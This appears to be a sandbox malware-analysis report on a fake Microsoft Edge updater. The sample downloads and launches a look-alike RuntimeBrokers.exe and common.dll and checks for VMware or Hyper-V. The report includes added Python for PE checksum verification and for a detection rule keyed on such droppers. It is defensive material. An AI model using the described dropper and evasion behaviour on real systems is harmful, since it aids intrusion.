Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: %1!s! Installer&Hindi Alam na Error sa Installer ErrorZHindi na-install. Kailangan ng %1!s! Installer ang Windows 2000 Service Pack 4 o mas bago.Microsoft
Source: unknown Process created: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe "C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: common.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: MicrosoftEdgeUpdateSetup.exe Static file information: File size 1634896 > 1048576
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x166200
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\ci_dev\wegame_client\build\bin\Release\tcls_core.pdb source: RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: mi_exe_stub.pdb source: MicrosoftEdgeUpdateSetup.exe
Source: Binary string: D:\ci_dev\wegame_client\build\lib\Release\common.pdb source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: #lkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0045E100 LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_0045E100
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: real checksum: 0x198153 should be: 0x190fbb
Source: common.dll.0.dr Static PE information: real checksum: 0x3bfec6 should be: 0x3c4694
Source: common[1].dll.0.dr Static PE information: real checksum: 0x3bfec6 should be: 0x3c4694
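The three "real checksum ... should be" entries above come from recomputing IMAGE_OPTIONAL_HEADER.CheckSum over the whole file and comparing it with the stored value. The following Python is an added example, not part of the sandbox output or of either sample: it implements that recomputation (the same word-sum-with-carry-fold that Windows' CheckSumMappedFile performs) and checks it against a minimal, non-loadable PE32 skeleton constructed inline. The skeleton's field values and the 42060 result are assumptions of this example, not values taken from the report. One caveat a practitioner should keep in mind: Windows only enforces the checksum for kernel drivers and a few boot-critical system images, and many legitimately built user-mode binaries ship with a zero or stale value, so a mismatch on its own is weak evidence; here it is one signal among many.

```python
"""Recompute and verify the PE header CheckSum field (added example, not from the report)."""
from __future__ import annotations

import struct


def pe_checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 'PE\\0\\0' + IMAGE_FILE_HEADER + 0x40."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 0x40


def compute_pe_checksum(data: bytes) -> int:
    """Sum every 32-bit word except the CheckSum field itself, fold carries to 16 bits, add the file length."""
    skip_index = pe_checksum_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)  # the last partial word is zero-extended
    checksum = 0
    for i in range(len(padded) // 4):
        if i == skip_index:
            continue
        checksum += struct.unpack_from("<I", padded, i * 4)[0]
        if checksum >= 1 << 32:  # end-around carry, as the native routine does
            checksum = (checksum & 0xFFFFFFFF) + (checksum >> 32)
    checksum = (checksum & 0xFFFF) + (checksum >> 16)
    checksum += checksum >> 16
    checksum &= 0xFFFF
    return checksum + len(data)


def stored_pe_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, pe_checksum_offset(data))[0]


def check_pe_checksum(data: bytes) -> tuple[bool, int, int]:
    """Return (matches, stored, computed), the comparison behind the 'invalid checksum' signature."""
    stored = stored_pe_checksum(data)
    computed = compute_pe_checksum(data)
    return stored == computed, stored, computed


def build_minimal_pe(stored_checksum: int = 0) -> bytes:
    """Constructed PE32 skeleton (DOS header, PE signature, file header, optional header; no sections).

    Not loadable; it exists only so the checksum code can be exercised offline.
    """
    img = bytearray(64 + 4 + 20 + 224)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)              # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x44, 0x014C)            # Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", img, 0x54, 224)               # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", img, 0x58, 0x10B)             # Magic = PE32
    struct.pack_into("<I", img, 0x58 + 0x40, stored_checksum)  # OptionalHeader.CheckSum
    return bytes(img)


if __name__ == "__main__":
    sample = build_minimal_pe()
    ok, stored, computed = check_pe_checksum(sample)
    print(f"real checksum: {stored:#x} should be: {computed:#x} ({'ok' if ok else 'mismatch'})")
```

Run against a real file with `check_pe_checksum(open(path, "rb").read())`; the `stored` and `computed` values correspond to the report's "real checksum" and "should be" respectively.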
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: section name: .didat
Source: common[1].dll.0.dr Static PE information: section name: .QMGuid
Source: common.dll.0.dr Static PE information: section name: .QMGuid
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00179167 push ecx; ret 0_2_00179166
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004AEFE2 push ecx; ret 1_2_004AEFF5
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004AF236 push ecx; ret 1_2_004AF249
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C1C2EE4 push ecx; ret 1_2_6C1C2EF7
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit, 0_2_00166690
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Roaming\common.dll
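The URLDownloadToFileA / ShellExecuteA chain, the PE files written under the user's profile, and the process-creation entries above form one behaviour a detection engineer can key on: a process writes an executable into a user-writable directory and then launches it, and the dropped file's name imitates a Windows system binary (RuntimeBrokers.exe for RuntimeBroker.exe). The following Python is an added example of that detection logic, not part of the report; it runs over constructed process-create and file-create events that mirror the chain in this report (Sysmon-style fields, abbreviated), and the watch lists of system-binary names and user-writable path fragments are assumptions chosen for illustration.

```python
"""Flag a dropper launching a look-alike PE from a user-writable path (added example, constructed events)."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Assumption: a short list of Windows binary names worth watching for imitation.
SYSTEM_BINARY_BASENAMES = {"runtimebroker", "svchost", "dllhost", "conhost", "csrss", "lsass"}

# Assumption: directory fragments a standard user can write to without elevation.
USER_WRITABLE_FRAGMENTS = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\temp\\",
    "\\inetcache\\",
    "\\users\\public\\",
    "\\programdata\\",
)


@dataclass(frozen=True)
class Event:
    kind: str    # "file_create" or "process_create" (Sysmon event IDs 11 and 1, respectively)
    actor: str   # full image path of the process that performed the action
    target: str  # file written, or image path of the child process


def in_user_writable_dir(path: str) -> bool:
    lowered = path.lower()
    return any(fragment in lowered for fragment in USER_WRITABLE_FRAGMENTS)


def mimicked_system_binary(path: str) -> str | None:
    """Return the genuine name a file name imitates by appending characters, else None."""
    stem = ntpath.splitext(ntpath.basename(path))[0].lower()
    for genuine in SYSTEM_BINARY_BASENAMES:
        # An exact match is (or claims to be) the real binary; the signal is the near-miss.
        if stem != genuine and stem.startswith(genuine):
            return genuine
    return None


def detect(events: list[Event]) -> list[tuple[str, str, list[str]]]:
    """Return (parent, child, reasons) for every process launch that meets at least two criteria."""
    dropped_by: dict[str, str] = {}  # lower-cased PE path -> lower-cased path of the process that wrote it
    alerts: list[tuple[str, str, list[str]]] = []
    for ev in events:
        target = ev.target.lower()
        if ev.kind == "file_create":
            if target.endswith((".exe", ".dll")):
                dropped_by[target] = ev.actor.lower()
            continue
        if ev.kind != "process_create":
            continue
        reasons = []
        if dropped_by.get(target) == ev.actor.lower():
            reasons.append("launches a PE it wrote itself")
        if in_user_writable_dir(target):
            reasons.append("image lives in a user-writable directory")
        genuine = mimicked_system_binary(target)
        if genuine:
            reasons.append(f"name imitates {genuine}.exe")
        if len(reasons) >= 2:
            alerts.append((ev.actor, ev.target, reasons))
    return alerts


# Constructed events mirroring the chain in this report (not sandbox output).
DROPPER = r"C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe"
SAMPLE_EVENTS = [
    Event("file_create", DROPPER, r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe"),
    Event("file_create", DROPPER, r"C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"),
    Event("file_create", DROPPER, r"C:\Users\user\AppData\Roaming\common.dll"),
    Event("process_create", DROPPER, r"C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"),
    # Benign control: Explorer starting the genuine broker from System32 must not alert.
    Event("process_create", r"C:\Windows\explorer.exe", r"C:\Windows\System32\RuntimeBroker.exe"),
]

if __name__ == "__main__":
    for parent, child, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT {parent} -> {child}: {'; '.join(reasons)}")
```

Requiring two of the three criteria keeps ordinary installers that launch a helper from %TEMP% below the threshold while still firing on the self-dropped, look-alike case seen here; tune the lists to the estate before deploying.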
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0041ABA7 GetPrivateProfileIntW, 1_2_0041ABA7
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00478D13 GetPrivateProfileIntW, 1_2_00478D13
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004517EF SHGetFolderPathW,GetPrivateProfileIntW, 1_2_004517EF
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00451970 SHGetFolderPathW,GetPrivateProfileStringW, 1_2_00451970

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0044D2F4 rdtsc 1_2_0044D2F4
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: ?get_first_mac2@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,__EH_prolog3_catch_GS,GetAdaptersInfo,GetAdaptersInfo,?get_log_instance@base@@YAPAVILogger@1@XZ,__Init_thread_footer, 1_2_6C127C98
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\common[1].dll
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe API coverage: 0.9 %
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_0016207E
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016231F FindFirstFileExW,GetSystemTimeAsFileTime,FindNextFileW,FindClose, 0_2_0016231F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00484A62 FindFirstFileW,MoveFileExW,CopyFileW,FindNextFileW,FindClose, 1_2_00484A62
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0046CDBA FindFirstFileW,_wcsrchr,_wcsrchr,DeleteFileW,FindNextFileW,FindClose, 1_2_0046CDBA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00468440 GetLogicalDriveStringsW,QueryDosDeviceW, 1_2_00468440
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0017B9B7 VirtualQuery,GetSystemInfo, 0_2_0017B9B7
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Gc
Source: common.dll.0.dr Binary or memory string: WQLSELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=TRUEroot\cimv2Win32_NetworkAdapterConfigurationSetDNSServerSearchOrderDNSServerSearchOrderIndexCaptionvmwarevirtualWin32_NetworkAdapterConfiguration.Index=%d[repair_dns] success.
Source: RuntimeBrokers.exe Binary or memory string: vmware
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: RuntimeBrokers.exe, 00000001.00000002.2954997145.0000000000C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0044D2F4 rdtsc 1_2_0044D2F4
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016EA6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0016EA6A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0048621A EnterCriticalSection,SetFilePointer,GetLastError,OutputDebugStringW,WriteFile,LeaveCriticalSection, 1_2_0048621A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0045E100 LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_0045E100
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016BA2B mov eax, dword ptr fs:[00000030h] 0_2_0016BA2B
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00170268 mov eax, dword ptr fs:[00000030h] 0_2_00170268
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004DFB26 mov eax, dword ptr fs:[00000030h] 1_2_004DFB26
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016132B GetProcessHeap,__Init_thread_footer,__Init_thread_footer, 0_2_0016132B
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00168902 SetUnhandledExceptionFilter, 0_2_00168902
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016EA6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0016EA6A
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00168C03 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00168C03
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016876F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0016876F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004AE04B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_004AE04B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004BABCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004BABCA
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00165EBB SetSecurityDescriptorDacl, 0_2_00165EBB
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00168A15 cpuid 0_2_00168A15
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_004F20F5
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004E6FB1
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetLocaleInfoW, 1_2_004AD30E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: ___crtGetLocaleInfoEx, 1_2_004AD407
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_004F179F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetLocaleInfoW, 1_2_004E7A01
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004F1A17
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004F1A80
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004F1B1B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004F1F21
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0EAA53 __EH_prolog3,InitializeCriticalSection,GetCurrentProcessId,GetCurrentThreadId,CreateNamedPipeA,CreateThread,CreateEventA, 1_2_6C0EAA53
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_0016207E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C15687C ?SetFileAuthority@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,__EH_prolog3_GS,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,GetUserNameW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ, 1_2_6C15687C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004D8CEE _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 1_2_004D8CEE
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00408D44 GetVersionExW, 1_2_00408D44
